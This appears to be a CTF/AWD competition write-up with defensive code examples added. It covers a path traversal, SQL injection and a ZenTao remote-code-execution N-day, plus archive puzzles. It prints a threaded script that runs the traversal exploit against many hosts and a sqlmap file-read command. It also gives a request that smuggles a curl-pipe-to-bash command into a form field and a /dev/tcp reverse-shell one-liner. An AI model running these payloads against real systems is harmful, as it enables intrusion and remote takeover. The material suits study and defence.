AWD

Target 1

Access the following URL:

http://192.168.103.*:8080/frontend/ajax/getfile?file=../../../../../../flag.txt

This exploits the arbitrary file download (path traversal) vulnerability directly.
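The root cause is a file parameter that is joined onto a base directory without any containment check, so a chain of ../ walks out to the filesystem root. The Python below is an added example (not the target application's code) of the server-side check that closes this: canonicalise the joined path and require it to still lie under the allowed directory. ALLOWED_ROOT and the function names are assumptions; the request URL it classifies is the one from this writeup.

```python
from pathlib import Path
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Added example, not the target application's code. ALLOWED_ROOT is a
# hypothetical directory standing in for wherever getfile is meant to serve from.
ALLOWED_ROOT = "/srv/app/files"


def resolve_download(requested: str, root: str = ALLOWED_ROOT) -> Optional[Path]:
    """Return the canonical file path to serve, or None if it escapes the root.

    resolve() collapses every '..' segment (and follows symlinks) before the
    containment test, so nested or encoded traversal sequences are handled the
    same way as the plain '../' chain in the writeup URL.
    """
    base = Path(root).resolve()
    target = (base / requested).resolve()   # an absolute 'requested' replaces base entirely
    if target == base:
        return None                          # empty name: the directory itself is not a file
    try:
        target.relative_to(base)
    except ValueError:
        return None
    return target


def check_getfile_url(url: str) -> str:
    """Classify a getfile request as 'ok', 'traversal' or 'missing' (no file param)."""
    values = parse_qs(urlsplit(url).query).get("file")
    if not values or values[0] == "":
        return "missing"
    # parse_qs percent-decodes, so '%2e%2e%2f' is inspected as '../'
    return "ok" if resolve_download(values[0]) is not None else "traversal"


if __name__ == "__main__":
    # The request from the writeup, and a benign one for comparison
    for u in (
        "http://192.168.103.1:8080/frontend/ajax/getfile?file=../../../../../../flag.txt",
        "http://192.168.103.1:8080/frontend/ajax/getfile?file=reports/q1.pdf",
    ):
        print(check_getfile_url(u), u)
```

The containment test is done on the resolved path rather than by searching the input for "..": that way percent-encoded, doubled or symlinked variants are all judged by where they actually end up.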

Then a Python script to run it against every target in bulk:

import concurrent.futures
import re

import requests

proxies = {'http': ''}

headers = {
    'cookie': '1'
}
result = []


def read_ip_list(filename):
    # One target IP per line (blank lines skipped)
    with open(filename, 'r') as file:
        ip_list = [ip.strip() for ip in file if ip.strip()]
    return ip_list


def exp_get(ip):
    url = f'http://{ip}:8080/frontend/ajax/getfile?file=../../../../../../flag.txt'
    # print(f'GET:{url}')
    try:
        resp = requests.get(url=url, headers=headers, proxies=proxies, timeout=3)
        # Raw string: '\S' in a plain literal is an invalid escape in newer Python
        match = re.search(r'(flag{\S+})', resp.text)
        if match:
            print(match.group(0))

        return resp
    except requests.RequestException:
        # Connection errors and timeouts: treat the host as a miss
        return False


def exp_post(ip, params, data):
    url = f'http://{ip}{params}'
    print(f'POST:{url}')
    try:
        resp = requests.post(url=url, headers=headers, data=data, proxies=proxies, timeout=3)
        return resp
    except requests.RequestException:
        return False


def main(ip_list):
    # Maximum number of worker threads; adjust as needed
    MAX_THREADS = 255

    # Run exp_get against every target with a thread pool
    with concurrent.futures.ThreadPoolExecutor(max_workers=MAX_THREADS) as executor:
        executor.map(exp_get, ip_list)


if __name__ == '__main__':
    ip_list = read_ip_list('living.txt')
    main(ip_list)

Target 2

The login form has a SQL injection vulnerability; pointing sqlmap at it is enough to pull out the flag.

Request:

POST /check_login HTTP/1.1
Host: 192.168.103.*:8080
Content-Length: 23
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.103.*:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/124.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.103.*:8080/login.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: JSESSIONID=xxxxxxxxx
Connection: close

user=admin&password=*

Then feed it to sqlmap:

python sqlmap.py -r 1.txt --batch --file-read=/flag.txt

This reads the flag; the retrieved file is saved under sqlmap's output directory.
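The login bypass comes down to the user and password fields being spliced into the SQL text, so a quote in the input changes the query instead of being compared as data. The Python below is an added example, not the challenge's JSP code: a constructed in-memory SQLite users table, the concatenated query beside a parameterised one, and a function that classifies what a client sees for each attempt. The table layout, the credential and the function names are constructed for the demonstration. Note that the --file-read step above additionally depends on the database account holding file-read privileges, which is a separate least-privilege failure; the example covers the injection itself.

```python
import sqlite3
from typing import Callable, Tuple

# Added example, not the challenge's code. The users table and credential are constructed.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'c0nstructed!')")
    return conn


def check_login_unsafe(conn: sqlite3.Connection, user: str, password: str) -> bool:
    # Both form fields are spliced into the SQL text, so a quote in either
    # changes the query structure instead of being compared as data.
    query = f"SELECT 1 FROM users WHERE user = '{user}' AND password = '{password}'"
    return conn.execute(query).fetchone() is not None


def check_login_safe(conn: sqlite3.Connection, user: str, password: str) -> bool:
    # Placeholders: the driver sends the values separately, the query shape is fixed.
    query = "SELECT 1 FROM users WHERE user = ? AND password = ?"
    return conn.execute(query, (user, password)).fetchone() is not None


def outcome(check: Callable[..., bool], user: str, password: str) -> str:
    """What a client observes for one login attempt: granted, denied or a SQL error."""
    try:
        return "granted" if check(make_db(), user, password) else "denied"
    except sqlite3.Error:
        return "sql_error"   # the symptom that tells a scanner its input reached the query


def compare(user: str, password: str) -> Tuple[str, str]:
    """Outcome of the same credentials against the unsafe and the safe check."""
    return outcome(check_login_unsafe, user, password), outcome(check_login_safe, user, password)


if __name__ == "__main__":
    for pw in ("c0nstructed!", "wrong", "' OR '1'='1", "'"):
        print(repr(pw), compare("admin", pw))
```

With the parameterised query every non-matching input, quotes included, is simply "denied": there is no error to detect and no way to alter the WHERE clause, which is what takes the sqlmap route away.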

CFS

Question 2

Brute-forced the login with Burp and got the weak password Passw0rd.

ZenTao N-day leading to remote code execution (RCE); the exploitable versions include 18.0 beta1.

image-20240421172924210

Construct two request packets plus a flag.sh that spawns a reverse shell.

POST /index.php?m=repo&f=create&objectID=0 HTTP/1.1
Host: 192.168.103.1
Content-Length: 157
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/124.0.0.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.103.1
Referer: http://192.168.103.1/index.php?m=repo&f=create&objectID=0
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: zentaosid=6otb2is8oog59d39gcn5g5tt5k; device=desktop; theme=default; lastProject=2; lang=zh-cn; hideMenu=false; storyModule=0; storyBranch=all; treeBranch=all; productStoryOrder=id_desc; preBranch=0; goback=%7B%22execution%22%3A%22http%3A%5C%2F%5C%2F192.168.103.1%5C%2Findex.php%3Fm%3Dproduct%26f%3Dall%22%2C%22project%22%3A%22http%3A%5C%2F%5C%2F192.168.103.1%5C%2Findex.php%3Fm%3Dproject%26f%3Dbrowse%22%2C%22admin%22%3A%22http%3A%5C%2F%5C%2F192.168.103.1%5C%2Findex.php%3Fm%3Dadmin%26f%3DresetPWDSetting%22%2C%22product%22%3A%22http%3A%5C%2F%5C%2F192.168.103.1%5C%2Findex.php%3Fm%3Dproduct%26f%3Dall%22%7D; preProductID=2; windowWidth=1504; windowHeight=809; tab=devops
Connection: close

product%5B%5D=1&projects%5B%5D=2&SCM=Gitlab&serviceProject=0&name=test&path=&encoding=utf-8&client=&account=&password=&encrypt=base64&desc=&uid=6624c5716503e

POST /index.php?m=repo&f=edit&repoID=0 HTTP/1.1
Host: 192.168.103.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.103.1/index.php?m=repo&f=edit&repoID=1&objectID=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
Origin: http://192.168.103.1
Connection: close
Cookie: zentaosid=07ookbs94j2r2i6qraleo4k45v; lang=zh-cn; device=desktop; theme=default; windowWidth=1600; windowHeight=389
Upgrade-Insecure-Requests: 1

SCM=Subversion&client=`curl http://192.168.1.169:8000/flag.sh|bash`

flag.sh:

bash -i >& /dev/tcp/192.168.1.168/6666 0>&1

This gives a reverse shell.
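The second request works because the client field, which should only ever hold the path to an SCM binary, ends up inside a shell command line, so the backtick substitution runs. As an added example (not ZenTao's code), the Python below parses that exact form body, applies a strict allow-list to the client value, and builds the SCM invocation as an argv list for subprocess with shell=False, so even a value that slipped past validation would never be parsed by a shell. The allow-list pattern and the function names are assumptions.

```python
import re
from typing import Dict, List
from urllib.parse import parse_qs

# Added example, not ZenTao's code. CAPTURED_BODY is the second request body
# from the writeup; the allow-list pattern and function names are assumptions.
CAPTURED_BODY = "SCM=Subversion&client=`curl http://192.168.1.169:8000/flag.sh|bash`"

# The client setting is the path to an SCM binary: an absolute path made of
# plain filename characters, nothing a shell would interpret.
CLIENT_PATH_RE = re.compile(r"^/[A-Za-z0-9._-]+(/[A-Za-z0-9._-]+)*$")
SHELL_META_RE = re.compile(r"[`$|;&<>()\n\\'\"]")


def parse_form(body: str) -> Dict[str, str]:
    """Decode an application/x-www-form-urlencoded body to {field: first value}."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def validate_client(value: str) -> str:
    """'ok' or a reason the value must not be used as a client path."""
    if SHELL_META_RE.search(value):
        return "rejected: shell metacharacters"
    if not CLIENT_PATH_RE.match(value):
        return "rejected: not an absolute binary path"
    return "ok"


def build_scm_command(client: str, subcommand: str, repo_url: str) -> List[str]:
    """argv for subprocess.run(argv, shell=False): no shell ever parses these strings."""
    if validate_client(client) != "ok":
        raise ValueError("refusing to run an unvalidated client path")
    return [client, subcommand, repo_url]


def review_request(body: str) -> Dict[str, str]:
    """Verdict for one repo-edit form body, usable from request logging or a WAF-style check."""
    fields = parse_form(body)
    client = fields.get("client", "")
    return {"scm": fields.get("SCM", ""), "client": client, "verdict": validate_client(client)}


if __name__ == "__main__":
    print(review_request(CAPTURED_BODY))
    print(build_scm_command("/usr/bin/svn", "info", "https://svn.example/repo"))
```

The two layers are deliberate: the allow-list rejects the captured payload outright and makes a useful detection signal, while the argv form removes the shell from the execution path so the fix does not depend on the regex being perfect.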

image-20240421173059427

Got the flag from flag02.txt.

Also found flag03.txt in /home/ctf, but without permission to read it; that needed privilege escalation and there was no time left.

Question 3, part 1

Directory scanning turned up a downloadable archive; extracting it gave a pcap, its password was brute-forced to 123456, and that yielded the first flag.

Question 3, part 2

image-20240421133729511

After the competition

Heard that flag01 was in the ZenTao back end, but the environment was already gone. A painful loss.

Question 2

After getting the reverse shell, found a secret folder in the root directory.

image-20240422150731225

Inside was a scret.zip.

The archive password could not be cracked during the competition; after the event it was cracked as 20240321 (we had assumed 20240421).

Inside was a single file named easynote_; our pwn teammate took it for a pwn challenge from the name, but the file format did not match (although it later turned out it really was pwn).

image-20240422151059323

It was placed in the root directory, inside the secret folder, so it could not be useless. Looking at it from a misc angle, we suspected it was an archive.

An archive with its file header inverted: the header should be 504B0304. Write a script to reverse it back.

First copy the hex data out with 010 Editor (a script would also work), then read the hex string four characters at a time and write each group back reversed.

with open('data.txt', 'r') as f:
    with open('result.txt', 'ab') as ff:
        string = f.read().strip()
        number = len(string) // 4            # whole 4-character groups only
        for i in range(number):
            result = string[i*4:i*4+4]
            print(result[::-1])
            ff.write(bytes.fromhex(result[::-1]))

The script has a small problem: it reads four characters at a time and the total length is not a multiple of four, so the trailing 00 byte is dropped.
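A variant of the conversion that keeps the trailing group, added here (not the original script): it strips the whitespace that 010 Editor copies along with the hex, steps through the string in four-character groups, and decodes the short final group instead of dropping it. The sample hex strings are constructed to mirror the inverted 504B0304 header described above.

```python
from pathlib import Path

# Added example, not the writeup's script. Sample hex strings are constructed
# to mirror the inverted 504B0304 ZIP header described above.
INVERTED_HEADER_HEX = "B405 4030"   # 504B0304 after the same per-group reversal


def unreverse_hex(hex_text: str, chunk: int = 4) -> bytes:
    """Reverse every `chunk`-character group of a hex dump and decode it to bytes.

    Whitespace and newlines (as copied from 010 Editor) are removed first.
    A final group shorter than `chunk` is reversed on its own and kept
    (for the trailing 00 in the writeup that is identical to keeping it as-is);
    the loop-by-count version silently dropped it.
    """
    digits = "".join(hex_text.split())
    if len(digits) % 2:
        raise ValueError("hex dump has an odd number of digits")
    out = bytearray()
    for i in range(0, len(digits), chunk):
        out += bytes.fromhex(digits[i:i + chunk][::-1])
    return bytes(out)


def looks_like_zip(data: bytes) -> bool:
    """True if the data starts with the ZIP local-file-header signature 50 4B 03 04."""
    return data[:4] == bytes.fromhex("504B0304")


def convert_file(src: str, dst: str) -> int:
    """Read a hex dump from src, write the recovered bytes to dst, return the byte count."""
    data = unreverse_hex(Path(src).read_text())
    Path(dst).write_bytes(data)
    return len(data)


if __name__ == "__main__":
    # With a trailing byte that the counted loop would have dropped
    recovered = unreverse_hex(INVERTED_HEADER_HEX + " 00")
    print(recovered, looks_like_zip(recovered))
```

Checking the recovered signature before writing the file is a cheap way to confirm the reversal hypothesis on the first four bytes before processing the whole dump.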

image-20240422151654663

It turned out not to affect opening the archive, though.

That yielded flag04.txt and the real pwn challenge source.

flag{6b80a45c6a2ef3db0f1d2988d913bf70}

image-20240422151734292

The archive password was simply unguessable. A painful loss.

(Our pwn teammate looked at the source and said it closely resembles a pwn challenge from CISCN 2022.)